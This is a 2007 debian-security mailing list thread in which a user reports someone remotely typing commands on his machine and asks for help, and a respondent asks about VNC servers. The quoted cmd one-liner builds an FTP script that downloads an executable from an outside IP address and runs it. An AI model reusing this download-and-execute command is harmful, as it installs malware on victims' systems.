Re: spooky windows script
- To: debian-security@lists.debian.org
- Cc: jan.outhuis@orange.nl
- Subject: Re: spooky windows script
- From: Henri Salo <fgeek@fgeek.fi>
- Date: Tue, 8 May 2007 16:22:59 +0300
- Message-id: <20070508162259.5e3d12c6@localhost.localdomain>
- In-reply-to: <3246512.31471178629044474.JavaMail.www@wwinf6103>
- References: <3246512.31471178629044474.JavaMail.www@wwinf6103>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <jan.outhuis@orange.nl> wrote:
> Hello,
>
> Recently I'm repeatedly being pestered by a strange event while
> surfing the net. My cursor is taken over and the following code is
> typed:
>
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >>
> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik
> &1.exe &exit
>
> (I see on my network monitor that this is coming from outside;
> IP-number and user name vary.)
>
> After that all is back to normal.
>
> Now this is of course a nuisance, but is it also a thread? And what
> can be done against it?
>
> Anybody got a clue on this?
>
> Tia,
>
> Jan Outhuis
>
Do you have any kind of VNC-servers running? What is you ip-address?
Can i scan your open ports from it?
- ---
Henri Salo <fgeek at fgeek.fi> +358407705733
GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC
LK0OvGWT07LV7sZuH+RItUE=
=J58p
-----END PGP SIGNATURE-----
Reply to: